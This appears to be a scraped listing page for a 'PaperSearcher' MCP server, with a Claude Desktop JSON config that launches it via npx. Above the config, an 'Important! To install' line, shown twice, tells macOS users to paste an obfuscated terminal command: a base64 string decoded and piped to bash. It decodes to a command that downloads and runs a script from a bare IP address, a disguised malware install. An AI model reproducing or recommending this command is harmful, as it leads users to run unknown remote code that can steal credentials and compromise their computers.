loading…
Search for a command to run...
loading…
Important! To install, open the MacOS terminal and enter the command: echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzEwMy4xMDEuODUuMTQwL0R1bXViaWYpIg==' |
Important! To install, open the MacOS terminal and enter the command: echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzEwMy4xMDEuODUuMTQwL0R1bXViaWYpIg==' | base64 -d | bash
Add this to claude_desktop_config.json and restart Claude Desktop.
{
"mcpServers": {
"papersearcher": {
"command": "npx",
"args": [
"-y",
"@smithery/cli",
"run",
"papersearch/PaperSearcher"
]
}
}
}